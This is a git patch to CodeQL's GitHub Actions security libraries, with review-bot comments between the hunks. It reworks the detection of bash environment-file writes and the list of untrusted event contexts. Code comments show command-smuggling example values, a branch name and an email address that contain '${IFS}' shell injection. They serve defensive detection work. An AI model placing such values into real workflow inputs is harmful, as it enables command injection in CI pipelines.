From 3e9c19044e58220399053ccb797f371c5de21c57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:01:27 +0200 Subject: [PATCH 0310/1267] Improve bash and source regexpps --- ql/lib/codeql/actions/Helper.qll | 288 +++++++++------ ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +- .../codeql/actions/dataflow/FlowSources.qll | 344 ++++++++---------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 54 +-- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 14 +- .../actions/security/PoisonableSteps.qll | 13 +- .../.github/workflows/multiline.yml | 56 +++ ql/test/library-tests/test.expected | 319 +++++++++++++--- ql/test/library-tests/test.ql | 86 ++++- .../.github/workflows/reusable_workflow.yml | 2 +- .../CWE-077/.github/workflows/test4.yml | 15 +- .../CWE-077/EnvVarInjectionCritical.expected | 16 +- .../CWE-077/EnvVarInjectionMedium.expected | 11 +- .../CWE-094/.github/workflows/test5.yml | 13 + .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + 17 files changed, 823 insertions(+), 440 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 416cb97c8d0..563a9800214 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -10,12 +10,11 @@ string normalizeExpr(string expr) { } bindingset[regex] -string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] +string wrapRegexp(string regex) { result = "\\b" + regex + "\\b" } + +bindingset[regex] +string wrapJsonRegexp(string regex) { + result = ["fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"] } bindingset[str] 
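Review bot: `wrapRegexp` in Helper.qll used to return the `fromJSON(...)` and `toJSON(...)` forms alongside the word-bounded form; it now returns only the word-bounded one, with the JSON forms moved to the new `wrapJsonRegexp`. Any caller that still uses `wrapRegexp` alone will silently stop matching sources wrapped in `toJSON()`, which shows up as missed findings rather than as an error. The callers are outside this hunk, so please confirm each one was migrated. Neither predicate has QLDoc; I would add `/** Gets a regexp that matches regex as a whole word. */` above `wrapRegexp` and `/** Gets a regexp that matches regex wrapped in fromJSON(...) or toJSON(...). */` above `wrapJsonRegexp`.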
@@ -23,135 +22,190 @@ private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -bindingset[line, var] -predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) +/** Checks if expr is a bash parameter expansion */ +bindingset[expr] +predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... 
+ regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) ) } -bindingset[var] -private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" +// TODO, the followinr test fails +bindingset[raw_content] +predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) } -bindingset[var] -private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - // echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" +bindingset[script] +predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + 
filters = "" and + content = script.regexpCapture(regexp, 2) + ) } -bindingset[var] -private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +bindingset[script] +predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) } -bindingset[script, var] -predicate extractMultilineAssignment(string script, string var, string key, string value) { +bindingset[script] +predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 3)) and + content = script.regexpCapture(regexp, 5) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 6)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 7) + ) +} + +bindingset[script] +predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + 
"(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 5)) + + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content + //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") + ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" + ) +} + +bindingset[script] +predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") + .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + filters = "" + ) +} + +bindingset[script] +predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) +} + +bindingset[script, file_var] +predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + 
file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) - ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) - ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) ) } -bindingset[line] -predicate extractPathAssignment(string line, string 
value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) - ) +predicate writeToGitHubEnv(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_ENV", content) } -predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) +predicate writeToGitHubOutput(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) } -predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) -} - -predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) +predicate writeToGitHubPath(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_PATH", content) } predicate inPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 61f0fa8e36e..1094a152126 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
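Review bot: The `$VAR` branch of `isBashParameterExpansion` uses `[a-zA-Z0-9_]+` after the first character, so a one-letter name such as `$T` is not recognised, while the `${VAR}` branches use `*`; for `envToEnvStoreStep`, which calls this predicate with a workflow env var name, that can mean a missed taint step. I would change the line to `regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]*)\\b" and`. The `// ${!VAR}` comment also covers `${#VAR}` and should say so, and `// TODO, the followinr test fails` above `extractVariableAndValue` has a typo and does not say which test fails. None of the new predicates (`extractVariableAndValue`, `singleLineFileWrite`, `heredocFileWrite`, `linesFileWrite`, `blockFileWrite`, `extractFileWrite`) carries a QLDoc with an example of the shell form it recognises, which the removed `multiline*Regex` helpers did have as comments.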
@@ -749,12 +749,19 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + or // the job is triggered by a workflow_call event that can be triggered externally this.getATriggerEvent().getName() = "workflow_call" and - (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) + ( + exists(ExpressionImpl e, string external_trigger | + e.getEnclosingJob() = this and + e.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() + ) } /** Holds if the job is privileged. */ @@ -781,9 +788,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and - not expr.getFieldName() = "GITHUB_TOKEN" + not expr.getFieldName() = "GITHUB_TOKEN" ) } 
@@ -814,7 +821,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + not this.getATriggerEvent().getName() = "workflow_call" or // the Workflow is a Reusable Workflow only and there is // a privileged caller workflow or we cant find a caller diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca3e21e9d25..5f2d36e7cd8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -19,186 +19,140 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -bindingset[context] -private predicate titleEvent(string context) { - exists(string reg | - reg = - [ - // title - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", - "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string titleEvent() { + result = + [ + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", + ] } -bindingset[context] -private predicate urlEvent(string context) { - exists(string reg | - reg = - [ - // url - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } + +private string textEvent() { + result = + [ + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + 
"github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + ] } -bindingset[context] -private predicate textEvent(string context) { - exists(string reg | - reg = - [ - // text - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string branchEvent() { + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . 
+ // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + result = + [ + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", + ] } -bindingset[context] -private predicate branchEvent(string context) { - exists(string reg | - reg = - [ - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. - // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . 
- // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string labelEvent() { + // - They cannot contain a escaping \ + result = ["github\\.event\\.pull_request\\.head\\.label",] } -bindingset[context] -private predicate labelEvent(string context) { - exists(string reg | - reg = - [ - // label - // - They cannot contain a escaping \ - "github\\.event\\.pull_request\\.head\\.label", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string emailEvent() { + // `echo${IFS}hello`@domain.com + result = + [ + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + ] } -bindingset[context] -private predicate emailEvent(string context) { - exists(string reg | - reg = - [ - // email - // `echo${IFS}hello`@domain.com - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] 
- | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string usernameEvent() { + // All characters must be either a hyphen (-) or alphanumeric + result = + [ + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] } -bindingset[context] -private predicate usernameEvent(string context) { - exists(string reg | - reg = - [ - // username - // All characters must be either a hyphen (-) or alphanumeric - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string pathEvent() { + result = + [ + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", + ] } -bindingset[context] -private predicate pathEvent(string context) { - exists(string reg | - reg = - [ - // filename - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string jsonEvent() { + result = + [ + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + 
"github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", + ] + or + result = titleEvent() + or + result = urlEvent() + or + result = textEvent() + or + result = branchEvent() + or + result = labelEvent() + or + result = emailEvent() + or + result = usernameEvent() + or + result = pathEvent() } -bindingset[context] -private predicate jsonEvent(string context) { - exists(string reg | - reg = - [ - // json - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - 
"github\\.event\\.workflow_run\\.pull_requests", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) -} - -class GitHubSource extends RemoteFlowSource { +class GitHubCtxSource extends RemoteFlowSource { string flag; - GitHubSource() { + GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and @@ -212,14 +166,15 @@ class GitHubSource extends RemoteFlowSource { override string getSourceType() { result = flag } } -class GitHubEventSource extends RemoteFlowSource { +class GitHubEventCtxSource extends RemoteFlowSource { string flag; - GitHubEventSource() { - exists(Expression e, string context | + GitHubEventCtxSource() { + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and ( + // the context is available for the job trigger events exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and @@ -227,23 +182,25 @@ class GitHubEventSource extends RemoteFlowSource { ) or exists(e.getEnclosingCompositeAction()) - ) - | - titleEvent(context) and flag = "title" - or - urlEvent(context) and flag = "url" - or - textEvent(context) and flag = "text" - or - branchEvent(context) and flag = "branch" - or - labelEvent(context) and flag = "label" - or - emailEvent(context) and flag = "email" - or - usernameEvent(context) and flag = "username" - or - pathEvent(context) and flag = "filename" + ) and + ( + regexp = titleEvent() and flag = "title" + or + regexp = urlEvent() and flag = "url" + or + regexp = textEvent() and flag = "text" + or + regexp = branchEvent() and flag = "branch" + or + regexp = labelEvent() and flag = "label" + or + regexp = emailEvent() and flag = "email" + or + regexp = usernameEvent() and flag = "username" + or + regexp = pathEvent() and flag = "filename" + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") ) } 
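Review bot: Renaming `GitHubSource` to `GitHubCtxSource` at the end of this hunk (and `GitHubEventSource` to `GitHubEventCtxSource` in the `@@ -212,14 +166,15 @@` hunk) removes two non-private class names from a pack declared `library: true`, so any query outside this diff that refers to the old names stops compiling. If downstream use is possible, keep aliases such as `deprecated class GitHubSource = GitHubCtxSource;` and `deprecated class GitHubEventSource = GitHubEventCtxSource;`. The new string-valued predicates (`titleEvent()`, `textEvent()`, and the others) also deserve a one-line QLDoc stating that they return regexp fragments that must be passed through `wrapRegexp` or `wrapJsonRegexp`.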
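Review bot: In `GitHubEventCtxSource` the check `normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*")` now matches the context anywhere in the expression, where the removed code required the whole expression to match. That catches contexts wrapped in a function call, but it also marks expressions that only test the value, such as a `contains(...)` or `==` comparison whose result is a boolean, as sources with the same flag. If that over-approximation is intended, say so next to the line: `// substring match on purpose: also fires on comparisons that merely mention the context`. The constructor starts in the previous hunk, so its full condition is not visible here.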
